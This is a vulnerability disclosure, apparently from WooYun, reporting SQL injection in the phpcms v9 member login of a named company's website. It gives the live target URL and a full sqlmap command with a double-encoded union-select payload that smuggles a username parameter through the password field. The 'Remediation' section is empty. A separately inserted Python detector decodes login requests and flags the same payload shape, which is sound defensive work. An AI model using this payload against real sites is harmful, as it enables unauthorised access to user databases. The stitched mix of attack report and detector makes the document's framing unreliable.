
SQL injection on the 网康科技 main site

2016-02-08 18:25

The 网康科技 main site runs phpcms v9, so I tested it with the injection PoC circulating online:

http://www.netentsec.com/index.php?m=member&c=index&a=login

The password field of the login form is the injection point: simulate a login, capture the request, and hand it to sqlmap.



python sqlmap.py -r C:\Users\test\Desktop\相关文件\1223.txt --prefix "test%26username%3d%2527%2bunion%2bselect%2b%25274%2527%252c%2527test%255c%2527%252c" --suffix "%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523"
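A defender-side check for the request shape this report exploits, added here as an example and not part of the original report: it repeatedly percent-decodes a captured login body (the payload above is double-encoded, so %2527 only becomes a quote after two rounds), looks for a union-select after the decode, and separately flags a form field whose value smuggles a second key=value pair via an encoded `&`. The sample requests, field names and helper names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample requests (path, POST body) modelled on the phpcms v9
# member login endpoint named in the report; not real captured traffic.
SAMPLE_REQUESTS = [
    ("/index.php?m=member&c=index&a=login", "username=alice&password=s3cret"),
    # same double-encoded shape as the report's payload: %2527 -> %27 -> '
    ("/index.php?m=member&c=index&a=login",
     "password=x%26username%3d%2527%2bunion%2bselect%2b%25274%2527%252c%2527test%2523"),
    ("/index.php?m=content&c=index&a=lists&catid=1", ""),
]

LOGIN_PATH = "m=member&c=index&a=login"
SQL_PATTERN = re.compile(r"['\"]\s*union\s+select|\bunion\s+all\s+select\b", re.I)


def full_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encodings surface.
    Returns (decoded_value, number_of_rounds_that_changed_something)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value.replace("+", " "))
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def smuggled_params(body):
    """Names of form fields whose decoded value carries a second key=value pair,
    i.e. a literal '&' hidden as %26 that only appears after decoding."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(re.search(r"&\w+=", full_decode(v)[0]) for v in values):
            hits.append(name)
    return hits


def inspect_login_request(path, body):
    """Return (flagged, reason) for one request to the member login endpoint."""
    if LOGIN_PATH not in path:
        return False, "not the member login endpoint"
    decoded, rounds = full_decode(body)
    if SQL_PATTERN.search(decoded):
        return True, f"SQL keywords after {rounds} decode round(s): {decoded[:60]}"
    if smuggled := smuggled_params(body):
        return True, f"extra parameter smuggled inside field(s): {smuggled}"
    return False, "clean"
```

Run it over real access-log or WAF-captured bodies for the login endpoint; a hit on either signal is worth alerting on even if the SQL keyword check alone is quiet, since the smuggled `&username=` is the part that makes the password field exploitable.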

[screenshot: 1 (2).jpg]

[screenshot: 2.png]

Proof of vulnerability:

[screenshot: 3.jpg]

Remediation:


Source: www.wooyun.org/bugs/wooyun-2016-0164106
